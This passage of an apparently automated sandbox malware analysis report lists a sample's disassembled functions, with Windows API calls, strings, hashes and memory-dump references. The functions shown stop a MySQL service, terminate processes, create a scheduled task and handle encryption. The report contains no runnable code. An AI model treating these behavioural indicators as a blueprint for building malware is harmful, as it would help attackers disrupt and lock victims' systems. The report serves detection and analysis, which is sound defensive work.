                                                                                                                            • Instruction Fuzzy Hash: 8411DA74D4020DBBCF04EFA5C595CDDBFBCEA04348F40856ABD2597241EA74A3098B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            • Opcode ID: c84f73e9f2c30da1e03c3b983ddfe2dc36ea175bff5ef7b2d27b5bbfce9000aa
                                                                                                                            • Instruction ID: 209b44514e889423210cb079ee489640a4411a90adcc9db559617a25bdd110a5
                                                                                                                            • Opcode Fuzzy Hash: c84f73e9f2c30da1e03c3b983ddfe2dc36ea175bff5ef7b2d27b5bbfce9000aa
                                                                                                                            • Instruction Fuzzy Hash: 70412832404705AFDB11BFA5DC42B9E7BE0AF44318F20482FF904A6282DB7D5645DF19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: fb6da6f6844ac9932a0c429f0466c2323644c5198917aa5647dbecfd438153bb
                                                                                                                            • Instruction ID: 74d58e29b59375b18bba7abdcb903fb2842f0246db8b6843f5f5a445de9f1a38
                                                                                                                            • Opcode Fuzzy Hash: fb6da6f6844ac9932a0c429f0466c2323644c5198917aa5647dbecfd438153bb
                                                                                                                            • Instruction Fuzzy Hash: 2DC1AF71740209DFDB18CF0CC9889AE77A6EF84704B64C92EE859CB741DB34ED468B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046DAEB
                                                                                                                            • CoCreateInstance.OLE32(00534F6C,00000000,00000001,00534F3C,?,?,0052A948,000000FF), ref: 0046DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0046DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0052A948,000000FF), ref: 0046DBE3
                                                                                                                            • _memset.LIBCMT ref: 0046DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 0046DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            • API String ID: 330603062-1376107329
                                                                                                                            • Opcode ID: 1b7849c59742f402c6e71969eeff81fd0461a937302db0d679ef5a2ca0966018
                                                                                                                            • Instruction ID: e4a8e22be0aa4d1b6409904d715e5f9baa882aa64fe7f5a8b027dfe143aa83e7
                                                                                                                            • Opcode Fuzzy Hash: 1b7849c59742f402c6e71969eeff81fd0461a937302db0d679ef5a2ca0966018
                                                                                                                            • Instruction Fuzzy Hash: 5251E470A40209AFDB00DF94CC89FAE7BB9FF49B05F108459F505AB291DB75A946CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00471A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00471A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00471A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00471A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            • API String ID: 2359367111-1651825290
                                                                                                                            • Opcode ID: 8dd393777ddf5d13771edb186755c5cbd996ce32e598fb3644e7335f1a20f09e
                                                                                                                            • Instruction ID: 2b2e498dfe0b8d0ac5423cfe01bc5fb2bff09120a51e7798f66acf16e4a08e91
                                                                                                                            • Opcode Fuzzy Hash: 8dd393777ddf5d13771edb186755c5cbd996ce32e598fb3644e7335f1a20f09e
                                                                                                                            • Instruction Fuzzy Hash: 6111A331A01205ABDB309BE89C4CFEF7BBCDF46751F040022FA04E3251D728D94ACAA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C5480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004C54C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C54D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004C54F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C5503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004C5531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004C555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004C55F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            • API String ID: 1717984340-2085858615
                                                                                                                            • Opcode ID: 8ea7087197c32a633d205b71c18483bd126ec1961a6c18e53ec12a93dcafa78f
                                                                                                                            • Instruction ID: 281a51e7bb5641c9819d769f210f1132d404f80e63e8eee903daaf2aa54287fc
                                                                                                                            • Opcode Fuzzy Hash: 8ea7087197c32a633d205b71c18483bd126ec1961a6c18e53ec12a93dcafa78f
                                                                                                                            • Instruction Fuzzy Hash: 92514C75B40604BBEB206B658C03FBF7A69AF15714F40002FFE01BB2C2D6695905C7AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0047244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00472469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004724A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 004724B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724B7
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004724C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            • API String ID: 2696918072-723907552
                                                                                                                            • Opcode ID: 7dd5e2de9af4d7e22e4b7362fc05484fd9acba695ced87c49a6e4bbe86caeb49
                                                                                                                            • Instruction ID: 9037aecd045fcd4b11b12cceb55fd8029414c17358ba4715e6247d686d5caf2f
                                                                                                                            • Opcode Fuzzy Hash: 7dd5e2de9af4d7e22e4b7362fc05484fd9acba695ced87c49a6e4bbe86caeb49
                                                                                                                            • Instruction Fuzzy Hash: 7901B5355012157BE7306BA4AC8DFAF7B6CEF09715F004051FD08D2242E7B489499BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            • API String ID: 1783060780-3771355929
                                                                                                                            • Opcode ID: 167f9b4d08eb172865d20fc771a999c2a2940c698e66ccca90185f5b69ec9f3e
                                                                                                                            • Instruction ID: ce87abb0f4028845320e2601a733c76b967423be4837c80db7668bcd2f5c36b2
                                                                                                                            • Opcode Fuzzy Hash: 167f9b4d08eb172865d20fc771a999c2a2940c698e66ccca90185f5b69ec9f3e
                                                                                                                            • Instruction Fuzzy Hash: 08A172B1C00249EBEF10EF95C956BDFBF75AF10308F14042DE40576292E7BA5648CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C3350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            • API String ID: 909875538-2908105608
                                                                                                                            • Opcode ID: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
                                                                                                                            • Instruction ID: 8240e64272c4f650fbbac5631cc545d7236695a19a62bf5d51d63ecfe3a95359
                                                                                                                            • Opcode Fuzzy Hash: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
                                                                                                                            • Instruction Fuzzy Hash: 69415B79BC834129F7655929BC03FC777815B50B1AF48886FFA88E92C3E688858741AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00485141
                                                                                                                              • Part of subcall function 00487D6C: EncodePointer.KERNEL32(00000000,?,00485146,00483FFE,00567990,00000014), ref: 00487D6F
                                                                                                                              • Part of subcall function 00487D6C: __initp_misc_winsig.LIBCMT ref: 00487D8A
                                                                                                                              • Part of subcall function 00487D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004926B3
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004926C7
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004926DA
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004926ED
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00492700
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00492713
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00492726
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00492739
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0049274C
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0049275F
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00492772
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00492785
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00492798
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004927AB
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004927BE
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004927D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00485146
                                                                                                                            • __mtterm.LIBCMT ref: 0048514F
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B62
                                                                                                                              • Part of subcall function 004851B7: _free.LIBCMT ref: 00488B69
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(0056AC00,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485174
                                                                                                                            • __initptd.LIBCMT ref: 00485196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0048519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction ID: 84dca69921717a3d6c4d4ed2404dfee7e71615566e5f58d2805b14def0d132e2
                                                                                                                            • Opcode Fuzzy Hash: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction Fuzzy Hash: 4BF0C232949A112DE6353A7A6C07B4F2A809F01738B210E1FF064D52D5EF5894415799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004853AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048594A
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(00000000,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • _free.LIBCMT ref: 00485970
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • __lock.LIBCMT ref: 00485989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00485998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 004859B1
                                                                                                                            • _free.LIBCMT ref: 004859C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            • Opcode ID: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
